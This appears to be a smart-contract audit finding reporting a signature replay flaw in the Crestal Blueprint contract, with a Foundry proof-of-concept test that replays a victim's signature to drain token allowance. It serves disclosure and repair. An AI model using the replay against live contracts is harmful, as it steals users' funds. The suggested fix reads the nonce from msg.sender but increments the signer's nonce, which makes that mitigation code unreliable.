Uneven Taupe Cougar

High

# EIP-712 Signature Replay Attack Vulnerability in Blueprint Contract

### Summary

Missing nonce and expiration timestamp in EIP-712 signature implementation will cause a significant security vulnerability for project owners as attackers will replay signatures to execute multiple operations with a single authorization, potentially draining user funds through repeated token transfers.

### Root Cause

In [EIP712.sol](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L19C5-L31C6), the implementation of EIP-712 typed structured data signing is incomplete and insecure. The signature digests used for verification (getRequestProposalDigest and getRequestDeploymentDigest) do not include replay protection mechanisms required by best practices in the EIP-712 standard. Specifically:

```solidity
function getRequestProposalDigest(bytes32 projectId, string memory base64RecParam, string memory serverURL)
    public
    view
    returns (bytes32)
{
    bytes32 structHash = keccak256(
        abi.encode(
            PROPOSAL_REQUEST_TYPEHASH, projectId, keccak256(bytes(base64RecParam)), keccak256(bytes(serverURL))
        )
    );
    return _hashTypedDataV4(structHash);
}
```
This function creates a digest based solely on the message content without including:

A nonce to prevent signature reuse
An expiration timestamp to limit signature validity period

According to the [EIP-712](https://eips.ethereum.org/EIPS/eip-712) standard section "Security Considerations", replay attack protection is essential but left to the application. The standard states: "In many practical applications, signed messages are used to authorize an action... it is very important that implementers make sure the application behaves correctly when it sees the same signed message twice."

### Internal Pre-conditions

- A user needs to sign at least one message using one of the contract's signature-based functions
- The valid signature is captured or observed by an attacker
- The signature has not been invalidated by any on-chain state changes

### External Pre-conditions

None

### Attack Path

- User signs a transaction for createAgentWithTokenWithSig or other signature-based function with parameters including their projectId, proposal data, and token payment
- Attacker captures the signature, either from network traffic, blockchain history, or other means
- Attacker calls the same function repeatedly with identical parameters and the captured signature
- Contract verifies the signature each time (as shown in the test generateSignature function) since there's no nonce to invalidate it after first use
- For functions involving payments, tokens will be transferred multiple times, draining the user's approved allowance
- For non-payment functions, multiple operations will be executed that should have only been authorized once

The BlueprintTest.sol file confirms this vulnerability by not having any tests that verify replay protection, and the generateSignature function shows that signatures are only based on static data:

```solidity
function generateSignature(bytes32 _projectId, string memory _base64Proposal, string memory _serverURL)
    internal
    view
    returns (bytes memory, address)
{
    bytes32 digest = blueprint.getRequestDeploymentDigest(_projectId, _base64Proposal, _serverURL);
    uint256 signerPrivateKey = 0xA11CE;
    (uint8 v, bytes32 r, bytes32 s) = vm.sign(signerPrivateKey, digest);
    return (abi.encodePacked(r, s, v), vm.addr(0xA11CE));
}

```



### Impact

The affected parties (project owners and users) suffer from:

- Multiple token payments for operations intended to execute once
- Potential significant financial loss due to repeated token transfers
- Multiple project deployments or configurations when only one was authorized
- State inconsistency in the system leading to unexpected behavior

For example, if a user approves the contract to spend 100 tokens and signs a transaction costing 20 tokens, an attacker could replay the signature 5 times, draining the full 100 token allowance. This is confirmed in the tests where token operations are executed through signature-based functions:

```solidity
// set none zero cost for create agents
blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);
mockToken.mint(address(this), validTokenAmount);
mockToken.approve(address(blueprint), validTokenAmount);
```
This vulnerability completely undermines the security model of the gasless transaction system and poses a significant risk to all users of the platform.

### PoC

```solidity
function test_SignatureReplayAttack() public {
    // Setup
    string memory base64Proposal = "test base64 proposal";
    string memory serverURL = "http://example.com";
    uint256 tokenAmount = 20 * 10**18;
    
    // Add payment token and set cost
    blueprint.addPaymentAddress(address(mockToken));
    blueprint.setCreateAgentTokenCost(address(mockToken), tokenAmount);
    
    // Setup victim account with tokens
    address victim = vm.addr(0xB0B);
    mockToken.mint(victim, 100 * 10**18);
    
    // Victim approves contract to spend tokens
    vm.prank(victim);
    mockToken.approve(address(blueprint), 100 * 10**18);
    
    // Victim signs transaction
    bytes32 digest = blueprint.getRequestDeploymentDigest(projectId, base64Proposal, serverURL);
    (uint8 v, bytes32 r, bytes32 s) = vm.sign(0xB0B, digest);
    bytes memory signature = abi.encodePacked(r, s, v);
    
    // Initial token balance
    uint256 initialBalance = mockToken.balanceOf(victim);
    
    // Attacker replays the signature multiple times
    for (uint i = 0; i < 5; i++) {
        blueprint.createAgentWithTokenWithSig(
            projectId, 
            base64Proposal, 
            workerAddress, 
            serverURL, 
            address(mockToken), 
            signature
        );
    }
    
    // Verify victim lost 5x the expected amount
    uint256 finalBalance = mockToken.balanceOf(victim);
    assertEq(finalBalance, initialBalance - (5 * tokenAmount), "Victim lost 5x tokens due to replay attack");
}
```

### Mitigation

- Implement a nonce system: 
```solidity
// Add mapping to track nonces
mapping(address => uint256) private nonces;

// Add function to get current nonce
function getNonce(address signer) public view returns (uint256) {
    return nonces[signer];
}

// Add function to increment nonce (called after signature verification)
function incrementNonce(address signer) internal {
    nonces[signer]++;
}
```
- Update type definitions to include nonce and deadline
```solidity
bytes32 public constant PROPOSAL_REQUEST_TYPEHASH =
    keccak256("ProposalRequest(bytes32 projectId,string base64RecParam,string serverURL,uint256 nonce,uint256 deadline)");

bytes32 public constant DEPLOYMENT_REQUEST_TYPEHASH =
    keccak256("DeploymentRequest(bytes32 projectId,string base64RecParam,string serverURL,uint256 nonce,uint256 deadline)");
```

- Modify signature digest functions:
```solidity
function getRequestProposalDigest(
    bytes32 projectId, 
    string memory base64RecParam, 
    string memory serverURL,
    uint256 nonce,
    uint256 deadline
) public view returns (bytes32) {
    bytes32 structHash = keccak256(
        abi.encode(
            PROPOSAL_REQUEST_TYPEHASH, 
            projectId, 
            keccak256(bytes(base64RecParam)), 
            keccak256(bytes(serverURL)),
            nonce,
            deadline
        )
    );
    return _hashTypedDataV4(structHash);
}
```
- Update all signature-using functions to verify and use nonces
```solidity
function createAgentWithTokenWithSig(
    bytes32 projectId,
    string memory base64Proposal,
    address privateWorkerAddress,
    string memory serverURL,
    address tokenAddress,
    uint256 deadline,
    bytes memory signature
) public returns (bytes32 requestID) {
    require(block.timestamp <= deadline, "Signature expired");
    
    // Get current nonce for signer (will be determined from signature)
    uint256 currentNonce = getNonce(msg.sender);
    
    // Create digest with nonce and deadline
    bytes32 digest = getRequestDeploymentDigest(
        projectId, 
        base64Proposal, 
        serverURL,
        currentNonce,
        deadline
    );
    
    // Get signer from signature
    address signerAddr = getSignerAddress(digest, signature);
    
    // Increment nonce to prevent replay
    incrementNonce(signerAddr);
    
    // Rest of function remains the same
    requestID = createAgent(signerAddr, projectId, base64Proposal, privateWorkerAddress, serverURL, 0, tokenAddress);
}
```
- Add replay protection to every function that uses signatures:

`createProjectIDAndProposalRequestWithSig`
`createProjectIDAndDeploymentRequestWithSig`
`createAgentWithWhitelistUsersWithSig`
`createAgentWithSigWithNFT`
`updateWorkerDeploymentConfigWithSig`